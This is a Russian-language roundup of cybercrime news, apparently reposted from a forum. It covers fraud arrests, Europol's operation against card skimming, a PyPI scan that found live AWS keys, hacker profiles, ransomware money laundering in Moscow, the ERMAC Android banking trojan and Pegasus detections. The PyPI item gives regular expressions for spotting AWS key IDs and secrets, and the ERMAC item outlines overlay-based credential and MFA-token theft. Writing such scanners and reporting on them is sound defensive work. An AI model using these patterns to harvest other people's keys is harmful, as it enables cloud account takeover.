Шутер S.T.A.L.K.E.R. 2 от компании GSC Game World может быть официально запрещён в России. Об этом сообщил первый заместитель председателя комитета Госдумы по информационной политике Антон Горелкин в интервью Daily Storm.
По словам Горелкина, такой запрет может быть введён не только из-за поддержки разработчиками иностранных военных формирований, но и в случае обнаружения в контенте игры противоправной информации, такой как экстремизм, оправдание терроризма или разжигание межнациональной розни. В случае обнаружения подобных материалов могут быть приняты суровые меры, сообщил Горелкин.
Он добавил, что, если в игре найдут запрещенную информацию, ответственность может лечь и на тех, кого признают причастными к ее распространению.
Адвокат Михаил Мушаилов в комментарии для Daily Storm отметил, что уголовная ответственность может грозить даже тем, кто приобретет игру, если её разработчики будут замечены в поддержке иностранных военных формирований. По его словам, если из открытых источников будет известно, что средства от продаж направляются на нужды иностранных государств, силовые ведомства могут заинтересоваться покупателями игры.
dailystorm.ru/obschestvo/v-gosdume-predupredili-geymerov-o-vozmozhnom-zaprete- videoigry-s-t-a-l-k-e-r-2-v-rossii
Федеральной службой безопасности Российской Федерации во взаимодействии с МВД России на территории Республики Дагестан задержаны пять членов организованной группы, причастных к созданию и реализации мошеннической схемы по хищению денежных средств граждан России в интересах украинских колл-центров.
Установлено, что злоумышленники, используя фиктивные документы, заключали с отечественными операторами связи договоры на оказание услуг IP-телефонии в виде получения в пользование многоканальных телефонных номеров фиксированной связи. После чего с помощью специального оборудования они обеспечили доступ к системе многоканальной связи гражданам Украины. С указанных номеров от имени российских правоохранительных органов, спецслужб, учреждений кредитно- финансовой сферы осуществлялись мошеннические звонки российским гражданам.
В ходе обысков, произведенных по местам жительства и работы подозреваемых, изъяты носители информации, средства связи и оргтехника, использовавшиеся в преступных целях.
Предварительный ущерб от указанной противоправной деятельности составляет более 100 млн. рублей, при этом его окончательный размер может быть значительно выше в связи с вновь поступающими сведениями. Правоохранительными органами также проверяется версия об использовании полученных преступным путем денежных средств для финансирования ВСУ в период проведения Специальной военной операции.
На основании представленных УФСБ России по Республике Дагестан материалов следственной частью Следственного управления МВД России по Республике Дагестан в отношении задержанных возбуждено уголовное дело по признакам преступления, предусмотренного ч. 5 ст. 33, ч. 4 ст. 159 УК России. Решением суда участники организованной группы заключены под стражу.
Кроме того, в различных регионах страны по фактам мошеннических действий с использованием средств связи фигурантов возбуждено свыше 190 уголовных дел.
• Video: https://videon.img.ria.ru/Out/Flv/20240925/2024_09_25_file2720_e501z2ag.ueo.mp4
• Source: http://www.fsb[.]ru/fsb/press/message/single.htm%21id%3D10440085%40fsbMessage.html
Европол объединил усилия с правоохранительными органами 17 стран для предупреждения 443 онлайн-продавцов о компрометации данных платежных карт их клиентов. В рамках двухмесячной операции, возглавляемой Грецией и поддерживаемой компаниями Group-IB и Sansec, была проведена борьба с цифровым скиммингом.
Суть скимминга заключается в том, что хакеры внедряют в интернет-магазины инструменты или вредоносное ПО для перехвата данных кредитных карт клиентов во время онлайн-оплаты. Такая проблема давно затрагивает популярные интернет- магазины.
Благодаря работе групп реагирования на инциденты компьютерной безопасности (Computer Security Incident Response Teams, CSIRT) и Агентства Евросоюза по кибербезопасности (European Union Agency for Cybersecurity, ENISA) затронутые сайты были оповещены о том, что их используют для проведения скимминг-атак.
Европол отмечает, что такие атаки часто остаются незамеченными в течение длительного времени. Украденные платёжные данные обычно выставляются на продажу в даркнете. Потребители часто не осознают, что их данные были скомпрометированы, пока злоумышленники не используют их для несанкционированных операций, и сложно установить момент утечки данных.
Правоохранительные органы предоставили техническую поддержку интернет- магазинам, помогая удалять вредоносные инструменты и обеспечивать безопасность клиентов. В операции участвовали в том числе США, Великобритания, Германия, Колумбия, Испания и Нидерланды.
По данным отчета Recorded Future, в даркнете продается 119 миллионов карт, что может привести к убыткам в размере $9,4 млрд. для эмитентов карт и к $35 млрд. потенциальных расходов на возврат средств для продавцов и покупателей в 2023 году. В 2022 году из-за скиммеров было скомпрометировано 45,6 миллиона записей с данными платежных карт.
Общее количество данных карт в продаже и их разделение на данные карт онлайн- (CNP) и физических платежей (CP)
Среди магазинов, в которые в 2023 году были внедрены скиммеры, особенно выделяются рестораны (18,5% от общего числа жертв), продавцы автозапчастей, магазины одежды и другие. США занимают лидирующие позиции по количеству карт, доступных на даркнете, с более чем 50 миллионами. Ни в одной другой стране или регионе такое количество не превышает 2,5 миллиона.
Ожидается, что в 2024 году мошенники усовершенствуют свои методы, продолжая использовать как традиционные, так и новые способы кражи карт. Карты, украденные из финансовых учреждений Северной Америки и Европы, по-прежнему будут занимать лидирующие позиции по продажам. Отчет предполагает, что в 2024 году киберпреступники будут использовать сложные технические решения, тонко настроенные процессы и методы социальной инженерии для обхода систем обнаружения мошенничества.
source:
europol.europa.eu/media-press/newsroom/news/action-against-digital-skimming-
reveals-443-compromised-online-merchants?mtm_campaign=newsletter
group-ib.com/media-center/press-releases/digital-skimming-action/
recordedfuture.com/annual-payment-fraud-intelligence-report-2023
therecord.media/59-4-million-compromised-payment-card-records-posted-for-sale-
on-dark-web-in-2022-report/
[Опубликованы](https://tomforb.es/i-scanned-every-package-on-pypi-and- found-57-live-aws-keys/) результаты сканирования пакетов в репозитории PyPI (Python Package Index) на предмет наличия забытых в коде ключей доступа к Amazon Web Services (AWS). Провести проверку побудил прошлогодний [инцидент](https://tomforb.es/infosys-leaked-fulladminaccess-aws-keys-on-pypi- for-over-a-year/) с утечкой AWS-ключей компании InfoSys. Как оказалось случай не единичный и в коде представленных в PyPi пакетов удалось выявить ещё 57 действующих ключей, которые присутствовали среди прочего в проектах таких крупных компаний, как Amazon, Intel, Terradata, General Atomics, Top Glove и Delta Lake, а также в репозиториях австралийского правительства и университетов Стэнфорда, Портланда и Луизианы.
Для поиска ключей в коде использовалась утилита ripgrep с регулярным выражением "((?:ASIA|AKIA|AROA|AIDA)([A-Z0-7]{16}))" для выявления наличия идентификаторов ключей и "[a-zA-Z0-9+/]{40}" для выявления самого ключа. Учитывались только действующие ключи, актуальность которых проверялась при помощи штатной CLI-утилиты aws. Проверка всего репозитория заняла 27 часов.
Самый старый из найденных ключей присутствовал в коде с 2013 года, а самый новый с 20 декабря 2022 года. В 11 случаях были найдены root-ключи (arn:aws:iam:..:root), в 18 - ключи непривилегированных пользователей (arn:aws:iam:..:user/пользователь), а в 22 - ключи доступа к сервису (arn:aws:iam:..:user/сервис).
Утечки разделены на три категории - случайно забытые в коде ключи, тестовые данные и преднамеренное использование (как правило для загрузки временных файлов Amazon S3). В качестве примеров случайно забытых ключей упоминается ключ компании Terradata, который был удалён из кода, но случайно [забыт](https://inspector.pypi.io/project/presto_docker_devenv/0.2/packages/cc/63/a3e1a2b014a9bddd17527edb78479f208d2e57df187048c2aa3916d26a4d/presto_docker_devenv-0.2-py2.7.egg/images/presto- local/debug#line.37) в специфичном для одной из платформ выпуске. В случае с компанией Amazon ключ был оставлен в amazon_pay SDK 2.5.1 в составе одного из тестовых сценариев.
После завершения эксперимента дополнительно был создан инструментарий для постоянного отслеживания утечек ключей в новых пакетах, публикуемых в PyPi, HexPM и RubyGems. Инструментарий вызывается через Github Actions и в случае выявления утечек автоматически отправляет информацию о проблеме в репозиторий и в AWS.
Группа хакеров Universal атаковали сайты Федеральной службы безопасности и Министерства юстиции в ночь на 1 января. Об этом в социальных сетях сообщил основатель правозащитного проекта Gulagu.net Владимир Осечкин.
По его словам, представители группы прислали ему ссылки на сайты ведомства, которые прекратили работу. Осечкин отметил, что ресурсы начинали работу, затем – снова прекращали, а в 2 часа ночи на сайте Минюста появилась табличка о проведении работ с сайтом. Правозащитник связывает атаку с требованием Universal прекратить пытки заключенных в учреждениях ФСИН, поскольку, отмечает Осечкин, Минюст контролирует систему исполнения наказания де-юре, а ФСБ – де- факто.
В телеграм-канале Universal появился призыв к ФСБ России очистить их ряды от "нечести и содомитов". "Мы напоминаем Вам, что Ваша структура должна обеспечивать безопасность наших близких, а не пытать их. Проверка не пройдена", - сказано в обращении. Сейчас работа обоих сайтов восстановлена.
Ранее участники Universal организовали DDOS-атаку атаку на сайт ФСИН России, но прекратили ее после обращения основателя проекта Gulagu.net Владимира Осечкина. Они также потребовали от ФСИН прекратить пытки заключенных.
При переходе на сайт msk.host идёт редерект на он канал https://t.me/mskhostohoh
Генеральная прокуратура (Кеджагун) установила виновных во взломе веб-сайта Kejaksaan.go.id. 16-летний автор с инициалами MFW живет в Лахате, Южная Суматра. MFW охраняла группа из районной прокуратуры Лахата и Верховной прокуратуры Южной Суматры, которые затем были доставлены в AGO. Он продавал базы данных базы на рейдфорум.

](https://www.jawapos.com/nasional/hukum-kriminal/19/02/2021/peretas-situs- kejaksaan-agung-seorang-pelajar-di-palembang/)
Peretas Situs Kejaksaan Agung Seorang Pelajar di Palembang
www.jawapos.com
Он отказался выходить под залог, чтобы продолжить работу с тюремным психиатром.
Известный в первую очередь по RaidForums и BreachForums хакер, скрывавшийся под ником Umbreon, еще в январе 2023 года был арестован в Нидерландах по обвинению во взломе, вымогательстве и отмывании денег. Вместе с ним по делу проходят два его подельника. Как сообщает портал DataBreaches, сотрудники которого проанализировали отрывистые данные местной полиции, Umbreon — это 21-летний гражданин Нидерландов из города Зандворт Пепейн Ван дер Стап (Pepijn Van der Stap).
Что удивительно в этой истории, Ван дер Стап был сотрудником ИБ-компании Hadrian Security, также он крайне активно сотрудничал с Голландским институтом раскрытия уязвимостей (DIVD), помогая обратившимся в него организациям находить уязвимости в своей инфраструктуре и ликвидировать их. DataBreaches удалось поговорить с Umbreon, несмотря на то что он заключен под стражу.
В частности, хакер признался, что использовал на различных площадках ники Lizardom, Egoshin, Espeon, Togepi, OFTF и Rekt. К наиболее излюбленным площадкам он отнес, помимо Breached и RaidForums, Sinister.li, HackForums, Leakforums и Maza.
«Предположения голландской полиции о том, что днем я был белым хакером, а ночью — черным, в корне неверны. Большая часть моей криминальной деятельности приходится на период, предшествовавший приходу в законную деятельность. Более того, с киберпреступниками я начал бороться еще до того, как стал белым хакером. В последние 16 месяцев перед арестом я не занимался противоправной деятельностью»,
Click to expand...
— сказал Ван дер Стап.
Помимо этого, Umbreon рассказал, что продолжительное время борется с посттравматическим стрессовым расстройством, которое сопровождается мигренями и паническими атаками. На пике симптоматики он спал не более двух часов в сутки, однако с преодолением проблем ему помогает тюремный психиатр. Терапия кажется Ван дер Стапу успешной.
«Отсутствие необходимости вести двойную жизнь, беспокоиться об OpSec и психиатрическая помощь позволили мне прийти к спокойствию. Например, я стал гораздо реже думать о членовредительстве, мне перестали сниться кошмары»,
Click to expand...
Сейчас его обвиняют во взломе серверов как минимум 11 компаний, вымогательстве, запугивании, отмывании 2,5 миллиона евро в криптовалюте. Однако не так давно Ван дер Стап принял решение признаться во всех атаках, к которым он был причастен. Их количество хакер охарактеризовал фразой «больше десяти, но меньше ста». На днях Umbreon присутствовал на предварительных слушаниях по его делу. Несмотря на возможность подать прошение об освобождении под залог, хакер не стал этого делать. Он мотивировал это нежеланием прерывать терапию с тюремным психиатром. Рассмотрение дела по существу назначено на октябрь 2023 года.
source: databreaches.net/i-had-been-chatting-with-a-blackhat-they-had-been- working-with-a-whitehat-we-were-both-dealing-with-the-same-person
Мошенники использовали фишинговые ссылки на тему соцвыплат. Чужими картами в основном расплачивались в интернет-магазинах
В Киеве киберспециалисты Нацполиции разоблачили мошенников, которые с помощью фишинга украли из банковских карт украинцев около 600 тыс. грн. Об этом сообщает Министерство внутренних дел.
Организатором мошеннической схемы стал 21-летний уроженец Николаевщины совместно со своей сожительницей. Они использовали фишинговые ссылки и Telegram-боты для получения банковских данных граждан. Фишинг маскировали под оказание социальной помощи от государства. Кроме того, данные банковских карт покупали в "Даркнете".
В ходе обысков у фигурантов изъяли мобильные телефоны, ноутбуки, технику,
товарные чеки и банковские карты.
Мужчине сообщили о подозрении по факту мошенничества (ч. 3 ст. 190 УК
Украины). Следствие продолжается, полиция устанавливает потерпевших.
По данным исследователей из компании Sophos, за последние 12 месяцев мошенники выманили у других киберпреступников более 2,5 миллионов долларов только на трех отдельных хак-форумах (Exploit, XSS и BreachForums).
О результатах изучения форумов даркнета эксперты рассказали во время [доклада](https://www.blackhat.com/eu-22/briefings/schedule/index.html#scammers- who-scam-scammers-hackers-who-hack-hackers-exploring-a-hidden-sub-economy-on- cybercrime-forums-and-marketplaces-28427) на конференции Black Hat Europe, а затем исследование было [опубликовано в блоге](https://news.sophos.com/en- us/2022/12/07/the-scammers-who-scam-scammers-on-cybercrime-forums-part-1/) компании.
«Мы наблюдали реферальные мошеннические схемы, обнаруживали фальшивые утечки данных и инструменты, тайпсквоттинг, фишинг, alt rep скам (использование sockpuppets для искусственного завышения репутации), фальшивых поручителей, шантаж, аккаунты, выдававшие себя за других лиц, а также вредоносные программы с бэкдорами, — рассказывают исследователи. — Мы даже видели случаи, когда злоумышленники в отместку обманывали мошенников, которые ранее обманули их самих».
Click to expand...
Мошенничество на трех изученных хак-форумах оказалось так распространено, что на всех ресурсах существуют специальные «арбитражные комнаты».
[](https://xakep.ru/wp- content/uploads/2022/12/409142/image1.jpg)
Так, на форуме Exploit насчитывается 2500 сообщений о мошенничестве и имеется отдельный раздел для подачи жалоб, а также ведется черный список, где записаны случаи подтвержденных мошеннических действий.
В свою очередь на XSS сообщается о 760 случаях мошенничества, и на форуме ведется «список рипперов» с мошенническими сайтами.
[](https://xakep.ru/wp- content/uploads/2022/12/409142/image2.jpg)
«Мошенничества на Exploit гораздо больше, как с точки зрения количества сообщений о скаме, так и с точки зрения денег, потерянных участниками. На этом форуме примерно в два раза больше пользователей, чем на XSS, и он больше привлекает мошенников просто из-за своей репутации», — рассказывают аналитики Sophos.
Click to expand...
Так, в «арбитражной комнате» Exploit содержатся 211 жалоб на общую сумму 1 021 998 долларов, а в черный список вошли 236 инцидентов, которые обошлись другим преступникам в 863 324 доллара. К примеру, в одном случае пользователь Exploit подал жалобу, пытаясь договориться с операторами вымогателя Conti о расшифровке данных компании. Однако администраторы форума закрыли это заявление, так как программы-вымогатели на Exploit запрещены.
Между тем, на XSS, для сравнения, открыто 120 претензий на общую сумму 509 901 доллар США, а на BreachForums, который существует лишь с апреля текущего года, уже насчитывается 21 жалоба на сумму 143 722 доллара.
Хотя в основном мошеннические схемы, на которых жалуются преступники, связаны с пяти- и шестизначными суммами, некоторые жертвы открывают претензии из-за куда меньших потерь (есть случаи, когда размер ущерба составляет всего 2 долларов США).
[](https://xakep.ru/wp- content/uploads/2022/12/409142/image3.jpg)
«Похоже, киберпреступников, как и всех остальных, возмущает, что их деньги украдены, и это не зависит от суммы», — пишут исследователи.
Click to expand...
В отчете отмечается, что такие разбирательства на хак-форумах нередко заканчиваются взаимными оскорблениями и полным хаосом, когда обвинитель обвиняет обвиняемого в мошенничестве. В некоторых случаях блокировке вообще подвергаются сами предполагаемые жертвы.
Тогда как бан является наиболее распространенным наказанием за мошенничество, на BreachForums также практикуется доксинг: здесь публикуют адрес электронной почты забаненых пользователей, регистрационные данные и последний IP-адрес, с которого они заходили на форум.
[](https://xakep.ru/wp- content/uploads/2022/12/409142/image18.jpg)
Несмотря на это, Sophos перечисляет несколько случаев, «с участием серийных мошенников», которые были заблокированы на хак-форумах, но после попросту создавали новые профили, платили регистрационный сбор и продолжали обманывать своих «коллег».
После заявлений властей США о «русском следе» в кибератаках на американский бизнес компания по кибербезопасности Recorded Future заявила, что часть денег вымогателей проходит через «Москва-сити»
Эксперты по кибербезопасности, отслеживающие деньги, выплачиваемые американскими компаниями российским бандам кибервымогателей, обнаружили, что они вели по одному из самых престижных адресов Москвы.
Когда организации по кибербезопсаности отследили миллионы долларов, которые американские компании, больницы и городские власти заплатили онлайн- вымогателям в виде выкупа, они сделали убедительное открытие: по крайней мере, часть этих денег прошла через один из самых престижных деловых адресов в Москве.
Администрация Байдена также сосредоточила внимание на здании Башня Федерация Восток, самом высоком небоскребе в российской столице. Соединенные Штаты нацелены на несколько компаний в башне, поскольку они стремятся наказать российские группы кибер-вымогателей, которые шифруют цифровые данные своих жертв, а затем требуют оплаты за их расшифровку.
Эти платежи обычно производятся в криптовалютах, виртуальных валютах, таких как биткойны, которые затем злоумышленники конвертируют в стандартные валюты, такие как доллары, евро или рубли.
То, что это высотное здание в финансовом районе Москвы стало очевидным центром такого отмывания денег, убедило многих экспертов по безопасности в том, что российские власти терпимо относятся к операторам программ-вымогателей. Они отмечают, что цели находятся почти исключительно за пределами России, и по крайней мере в одном случае, задокументированном в объявлении о санкциях США, подозреваемый помогал российскому агентству внешней разведки.
«Это говорит о многом», - сказал Дмитрий Смилянец, эксперт по анализу угроз из компании Recorded Future, занимающейся кибербезопасностью из Массачусетса. «У российских правоохранительных органов обычно есть ответ: «В российской юрисдикции нет открытых дел. Жертв нет. Как вы ожидаете, что мы будем преследовать этих уважаемых людей?»
Recorded Future насчитала около 50 криптовалютных бирж в столичном финансовом районе Москва-Сити, которые, по его оценке, занимаются незаконной деятельностью. Другие биржи в этом районе не подозреваются в приеме криптовалюты, связанной с преступностью.
Киберпреступность - лишь одна из многих проблем, разжигающих напряженность между Россией и США, наряду с наращиванием российской военной мощи на границах с Украиной и недавним миграционным кризисом на белорусско-польской границе.
По оценкам министерства финансов, с 2011 года американцы заплатили выкуп кибрепреступникам на общую сумму 1,6 миллиарда долларов. Согласно оценкам, один российский штамм-вымогатель, Ryuk, заработал в прошлом году около 162 миллионов долларов, шифруя компьютерные системы американских больниц во время пандемии и требуя плату за разглашение данных, об этом сообщила компания Chainalysis, отслеживающая транзакции с криптовалютой.
Атаки на больницы привлекли внимание к быстрорастущей преступной индустрии программ-вымогателей, базирующейся в основном в России. Преступные синдикаты стали более эффективными и наглыми в том, что превратилось в конвейерный процесс взлома, шифрования, а затем переговоров о выкупе в криптовалютах, которыми можно владеть анонимно.
На июньской встрече на высшем уровне президент США Джозеф Байден призвал путина принять меры по борьбе с программами-вымогателями после того, как российская банда DarkSide атаковала крупный нефтепровод на восточном побережье
Американские официальные лица указывают на таких людей, как Максим Якубец, худощавый 34-летний парень со стрижкой в стиле помпадур, которого США определили как одного из организаторов, участвовашего в крупной киберпреступной операции, банды, называющей себя Evil Corp. Аналитики по кибербезопасности связали его группу с серией атак программ-вымогателей, в том числе одно прошлогоднюю атаку на Национальную стрелковую ассоциацию. В объявлении о введении санкций США Якубец обвиняется в том, что он также помогает ФСБ РФ.
Но после того, как Госдепартамент объявил награду в размере 5 миллионов долларов за информацию, ведущую к его аресту, Якубец, казалось, только щеголял своей безнаказанностью в России: его сфотографировали за рулем Lamborghini в Москве, частично окрашенном флуоресцентно-желтым цветом.
Группа подозреваемых в отмывании преступных денег бирж по обмену криптовалютой прячется в Башне Федерации Восток, о которой впервые сообщили в прошлом месяце Bloomberg News, что еще раз демонстрирует, как российская индустрия кибервымогателей находится под протекторатом властей.
97-этажное здание из стекла и стали, стоящее на берегу Москвы-реки, находится в пределах видимости нескольких правительственных министерств финансового района, в том числе Министерства цифрового развития, связи и массовых коммуникаций России.
Два из самых решительных на сегодняшний день действий администрации Байдена по борьбе с программами-вымогателями связаны с башней. В сентябре министерство финансов ввело санкции в отношении криптовалютной биржи Suex, офисы которой расположены на 31 этаже. Компанию обвинили в отмывании незаконных средств на сумму 160 миллионов долларов.
В то же время в интервью основатель Suex Василий Жабыкин отрицал какую-либо незаконную деятельность.
А в прошлом месяце российские СМИ сообщили, что голландская полиция, используя ордер на экстрадицию в США, задержала владельца, Дениса Дубникова, другой фирмы под названием EggChange, офис которой находится на 22-м этаже. В заявлении одной из своих компаний Дубников отрицал какие-либо нарушения с его стороны.
По словам экспертов по кибербезопасности, программы-вымогатели привлекательны для преступников, поскольку атаки происходят в основном анонимно в Интернете, что сводит к минимуму шансы быть пойманным. Он превратился в разросшуюся, сильно разрозненную отрасль в России, известную исследователям кибербезопасности как «программа-вымогатель как услуга».
Организационная структура имитирует франшизы, такие как McDonald's или Hertz, что снижает барьеры для входа, позволяя менее искушенным хакерам использовать устоявшиеся методы ведения бизнеса для входа в бизнес. Несколько высокопоставленных группировок разрабатывают программное обеспечение и продвигают устрашающие бренды, такие как DarkSide или Maze, для запугивания предприятий и других организаций, являющихся жертвами. Другие группы, которые по сути являются исполнителями, взламывают компьютерные системы, используя бренд и франчайзинговое программное обеспечение.
Росту отрасли способствует рост криптовалют. Это сделало олдскульных денежных мулов, которым иногда приходилось переправлять наличные через границу, практически устаревшими.
Отмывание денге через криптовалютные биржи является последним и наиболее уязвимым шагом, поскольку преступники должны покинуть анонимный онлайн-мир, чтобы появиться в физическом месте, где они обменивают биткойны на наличные или кладут их в банк.
Обменные пункты - это «конец радуги биткойнов и программ-вымогателей», - говорит Гурвейс Григг, бывший агент ФБР, который является исследователем в Chainalysis, компании по отслеживанию криптовалют.
Компьютерные коды в виртуальных валютах позволяют отслеживать транзакции от одного пользователя к другому, даже если личности владельцев анонимны, до тех пор, пока криптовалюта не попадет на биржу. Теоретически записи должны связывать криптовалюту с реальным человеком или компанией.
«Они действительно являются одним из ключевых моментов во всем штамме программ-вымогателей», - говорит Григг об обменниках. По его словам, банды вымогателей «хотят зарабатывать деньги. Но пока вы не обналичите их и не получите через обмен в пункте выдачи наличных, то не сможете их потратить».
Именно здесь, по мнению экспертов кибербезопасности, следует выявлять и задерживать преступников. Но российское правительство позволило таким биржам процветать, заявив, что расследует киберпреступления только в случае нарушения российских законов. Регулирование - это серая зона в России, как и везде, в зарождающейся индустрии торговли криптовалютой.
Российские трейдеры криптовалюты заявляют, что Соединенные Штаты возлагают на их компании несправедливое бремя должной осмотрительности, учитывая быстро меняющийся характер правил.
«Люди, которые являются настоящими преступниками, которые создают программы- вымогатели, и люди, работающие в Москва-Сити, - совершенно разные люди», - сказал в интервью Garantex Сергей Менделеев, основатель одного из трейдеров, базирующегося в Federation Tower East, Garantex. По его словам, российские криптобиржи обвиняют в преступлениях, о которых они не подозревают.
Менделеев, который больше не работает в компании, сказал, что американские службы отслеживания криптовалюты предоставляют данные нероссийским биржам, чтобы помочь им избежать незаконных транзакций, но отказались работать с российскими трейдерами - отчасти потому, что они подозревают, что трейдеры могут использовать эту информацию. чтобы предупредить преступников. Это затрудняет попытки российских компаний искоренить незаконную деятельность.
Он признал, что не все российские биржи старались. По его словам, некоторые из них, находящиеся в финансовом районе Москвы, представляли собой не более чем офис, сейф с наличными деньгами и компьютер.
Согласно списку предприятий в здании, составленному российской картографической службой Яндекс, в Башне Федерации Восток базируется не менее 15 криптовалютных бирж.
Помимо Suex и EggChange, компании, на которые нацелена администрация Байдена, кибер-исследователи и международная компания по обмену криптовалют, отметили еще двух арендаторов зданий, которых они подозревают в незаконной деятельности, связанной с биткойнами.
Управляющий зданием, Aeon Corp, не ответила на вопросы о криптовалютных биржах в своих офисах.
«Подобно банкам и страховым компаниям, с которыми они делят помещения, эти фирмы, вероятно, выбрали это место из-за его статуса и строгой безопасности зданий», - сказал Смилянец, исследователь из Recorded Future.
«Небоскребы Москва-Сити очень красивы, - сказал он. «Они могут размещать в Instagram фото красивых видов из окон небоскреба. Это повышает их легитимность».
• Source: <https://www.nytimes.com/2021/12/06/world/europe/ransomware-russia- bitcoin.html>
Риккардо Спаньи обвиняют в мошенничестве во время работы в южноафриканской компании Cape Cookies в 2009-2011 годах
Один из основателей криптовалюты Monero Риккардо Спаньи 20 июля был арестован полицией в американском городе Нэшвилл, штат Теннесси, сообщает Cointelegraph. Спаньи обвиняют в мошенничестве в период с 2009 по 2011 год, когда он работал в южноафриканской компании Cape Cookies. Арест был произведен по запросу правительства ЮАР, которое добивается его экстрадиции. Если Спаньи экстрадируют в ЮАР, ему грозит до 20 лет тюрьмы.
Во время ареста Спаньи находился на борту частного самолета, следовавшего в Лос-Кабос (Мексика). Борт совершил посадку для дозаправки в Нэшвилле.
Исполняющая обязанности прокурора США Мэри Джейн Стюарт обратилась к суду с просьбой отклонить любые требования Спаньи об освобождении под залог. По мнению прокурора, у обвиняемого высокая мотивация к побегу, а также в распоряжении «значительные криптоактивы». 5 августа состоится судебное слушание, на котором решится, будет ли Спаньи находиться под стражей до рассмотрения своего дела.
Source:
cointelegraph.com/news/monero-s-former-maintainer-arrested-in-u-s-for-
allegations-unrelated-to-cryptocurrency
storage.courtlistener.com/recap/gov.uscourts.tnmd.87126/gov.uscourts.tnmd.87126.3.0_1.pdf
ERMAC, банковский троян для Android, позволяет злоумышленникам определять, когда запускаются определенные приложения, а затем перезаписывает изображение на экране, чтобы украсть учетные данные пользователя; подвергая риску миллиарды пользователей.
Безопасность устройств Android значительно улучшилась за последние годы
благодаря рыночным и конкурентным силам. Отчасти команды разработчиков
безопасности для Android добились этого, сосредоточившись на инструментах,
используемых разработчиками вредоносных программ, и снизив их эффективность. В
ответ разработчикам вредоносных программ пришлось проявить творческий подход,
чтобы выполнить свои гнусные задачи.
Одним из примеров является ERMAC, банковский троян для Android, появившийся в
августе 2021 года. Основанный на банковском трояне Cerberus. В частности,
ERMAC использует Accessibility Suite, чтобы определить, когда запускаются
определенные приложения, а затем перезаписывает изображение на экране, чтобы
украсть учетные данные пользователя. Пользователи обычно заражаются ERMAC
через поддельные сайты обновлений браузера.
Широко известная как атака «Оверлей» или «Веб-инъекция», ERMAC нацелена на более 400 банковских, финансовых и мобильных приложений электронной коммерции, включая Amazon, PayPal и Microsoft, для захвата учетных данных. Инъекции — одни из самых старых и опасных атак, направленных на приложения. В этом случае внедряется HTML-код, в результате чего перезаписываются приложения, вводящие пользователей в заблуждение.
Рисунок 1: Примеры фишинговых страниц, которые ERMAC накладывает поверх законных приложений.
Пользователи этих приложений думают, что они открыли законное приложение, но получают незаконное содержимое от вредоносного ПО. Когда пользователи вводят свои учетные данные, троян ERMAC перехватывает их. С точки зрения конечного пользователя трудно понять, отличается ли что-то или нет.
Пользователи должны явно предоставить ERMAC доступ к Accessibility Suite для выполнения атаки с наложением. ERMAC обычно пытается сделать это, запрашивая у пользователей разрешение на доступ через всплывающее окно. Если доступ будет разрешен пользователем, ERMAC автоматически предоставит нужные ему привилегии.
Рисунок 2: ERMAC создает окно, предлагающее пользователю предоставить права доступа.
Активировавшись, вредоносная программа выполняет такие действия, как определение запущенных приложений и перерисовка экрана, когда другое приложение находится в фокусе. Далее он собирает и отправляет список всех установленных приложений на командно-контрольный сервер. В ответ сервер отправляет обратно инъекционный контент для других приложений.
Что делает ERMAC таким грозным, так это его способность обходить методы аутентификации, тем самым обходить MFA. Функция ERMAC, известная как Google Authentication Grabber, по существу превращает ERMAC в инструмент захвата аккаунта, поскольку он крадет токены Google Authentication. ERMAC также может украсть токены аутентификации, отправленные через SMS. Таким образом, даже если вы делаете все правильно — надежные пароли и многофакторную аутентификацию, — вы все равно подвергаетесь захвату учетной записи.
Рисунок 3: Скриншот панели управления ERMAC, показывающий команды, доступные оператору.
Легко стать самодовольным и классифицировать любое вредоносное ПО как одноразовое. Но подробный анализ показывает, что очень сложная экосистема электронной преступности поддерживает ERMAC, ее разработчиков и пользователей.
Как сообщают исследователи, вдохновителем группы, продвигающей вредоносное ПО ERMAC, является DukeEugene, он же Duke Eugene или Eugene . Они арендуют вредоносное ПО как услугу (MaaS) на подпольных форумах за 5000 долларов в месяц, упрощают общение с клиентами и предоставляют доступ к панели управления вредоносными программами. У DukeEugene есть история и опыт в этой области, в 2020 году он был автором банковского трояна BlackRock для Android. Этот троянец также использовал модель MaaS.
Онлайн-форумы, служащие рынком для продажи ERMAC и других предложений MaaS, размещаются в «службах пуленепробиваемой публикации (BPH)», которые предоставляют инфраструктуру и услуги хостинга преступникам. Эти провайдеры рекламируют определенные услуги, но часто предоставляют поддержку, выходящую за рамки того, что они рекламируют на подпольных форумах.
ERMAC, вероятно, продолжит улучшать функции. Но важно понимать, что это не просто очередная хитроумная вредоносная программа; это вредоносное ПО, поддерживаемое сложной преступной группой с опытом, долголетием и инфраструктурой.
Таким образом, пользователи Android, использующие банковские, финансовые приложения и приложения для электронной коммерции, должны сохранять бдительность и осознавать эту постоянную угрозу.
source: intel471.com/blog/rmac-2-0-perfecting-the-art-of-account-takeover
[От лица Matthias Frielingsdorf, Co Founder & iOS Security Researcher для IVerify](https://iverify.io/blog/iverify-mobile-threat-investigation-uncovers- new-pegasus-samples)
На протяжении многих лет наше понимание угроз, связанных с мобильными устройствами, основывалось на опасно узкой основе. Исследования мобильных вредоносных программ ограничивались микроскопической выборкой устройств — как правило, тех, что принадлежали целям повышенного риска, таким как журналисты, политические активисты и государственные служащие. Эти ранние исследования были критически важными для понимания нового уровня угроз, однако их ограниченный характер оставил огромную «слепую зону» в осознании масштаба угроз для мобильных устройств.
Представьте, что вы пытаетесь понять весь океан, исследуя всего лишь одну ложку воды. Такова была ситуация с безопасностью мобильных устройств. Исследования были дорогими, времязатратными и доступны лишь ограниченному кругу людей с особыми судебно-экспертными навыками и большими ресурсами. Каждое исследование обычно охватывало всего несколько устройств, зачастую уже выбранных, поскольку они подозревались в компрометации.
Результат? Фундаментально искажённое восприятие безопасности мобильных устройств. Шпионские программы, такие как Pegasus, воспринимались как редкая, целенаправленная угроза — что-то, что может затронуть членов гражданского общества, высокопрофильных руководителей или политических представителей, но уж точно не обычных бизнес-профессионалов или пользователей смартфонов. Мы рассказывали себе удобные истории о редкости этих угроз, не пытаясь по- настоящему понять ситуацию.
Наш подход в iVerify был простым, но революционным: что если мы могли бы демократизировать охоту на угрозы для мобильных устройств? Что если каждый пользователь смартфона мог бы провести профессиональное сканирование безопасности всего за пять минут?
В мае 2024 года мы сделали именно это.
iVerify запустил функцию Mobile Threat Hunting, которая провела исследование, раскрывающее критические данные о текущем состоянии безопасности мобильных устройств. Наше первоначальное исследование включало 2500 устройств, самостоятельно отсканированных нашими пользователями, и привело к новым детекциям теперь уже знаменитой мобильной шпионской программы Pegasus.
путь
